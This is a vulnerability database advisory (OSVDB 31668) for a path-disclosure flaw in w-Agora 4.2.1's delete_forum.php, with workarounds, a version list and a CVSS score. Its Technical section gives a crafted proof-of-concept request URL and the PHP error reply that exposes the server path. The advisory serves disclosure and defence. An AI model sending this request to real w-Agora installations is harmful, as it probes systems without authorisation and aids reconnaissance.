31668 : w-Agora delete_forum.php Path Disclosure
Printer | http://osvdb.org/31668 | Email This | Edit Vulnerability

Views This Week Views All Time Added to OSVDB Last Modified Modified (since 2008) Percent Complete
6 1255 over 5 years ago over 3 years ago 0 times 90%

Timeline

Disclosure Date Exploit Publish Date
2007-03-19 2007-03-19

Description

w-Agora contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a specially-crafted URL request with an invalid parameter is passed to delete_forum.php, leading to a fatal error due to a call to an undefined function msgform() in delete_forum.php. The error information discloses the true path of the server-side scripts, resulting in a loss of confidentiality.

Classification

Location: Remote / Network Access
Attack Type: Information Disclosure
Impact: Loss of Confidentiality
Exploit: Exploit Public
Disclosure: OSVDB Verified
OSVDB: Web Related

Technical

==================
REQUEST
==================
http://[TARGET]/[w-agora-directory]/delete_forum.php?remove_site=1&cfg_dir=1&bn=1&ext=1&bn=&site_cfg_file=1

==================
REPLY
==================
...
<!--error--><br /> <b>Fatal error</b>: Call to undefined function: msgform() in <b> http://[TARGET]/[w-agora-directory]\delete_forum.php</b> on line <b>22</b><br /> <script language=JavaScript src='/errors__/phperror_js.php'></script>
...

Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s):
1) Set PHP register_globals to Off.
2) Disable warning messages by modifying the following in php.ini: display_errors = Off.
3) Modify the .htaccess file (this will only work on Apache servers).

Products

W-Agora
Watch-list
W-Agora
Watch-list
4.2.1
4.2.0 (not affected)
4.1.7 (not affected)
4.1.6a (not affected)
4.1.6 (not affected)
4.1.5 (not affected)
4.1.4 (not affected)
4.1.3 (not affected)
4.1.2a (not affected)
4.1.2 (not affected)
4.1.1 (not affected)
4.1.0 (not affected)
4.0.3 (not affected)
4.0.2a (not affected)
4.0.2 (not affected)
4.0.1 (not affected)
4.0.0 (not affected)
4.0b3 (not affected)
4.0b2 (not affected)
4.0b1 (not affected)

References

Credit

  • laurent gaffie - laurent.gaffiegmail.com -

CVSSv2 Score

CVSSv2 Base Score = 5.0
Source: nvd.nist.gov | Generated: 2007-03-22 | Disagree?

Access_vector_2 Access_complexity_2 Authentication_2 Confidentiality_impact_1 Integrity_impact_0 Availability_impact_0

Blogs

This section lists the latest news and blogs found via the daylife API (and for older items, the technorati API), which mention or otherwise discuss this vulnerability.

None found at this time

Comments

No Comments.

The database information may change without any notice. Use of the information constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the copyright holder or distributor (OSVDB or OSF) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

© Copyright 2012 Open Source Vulnerability Database (OSVDB), All Rights Reserved.
Privacy Statement - Terms of Use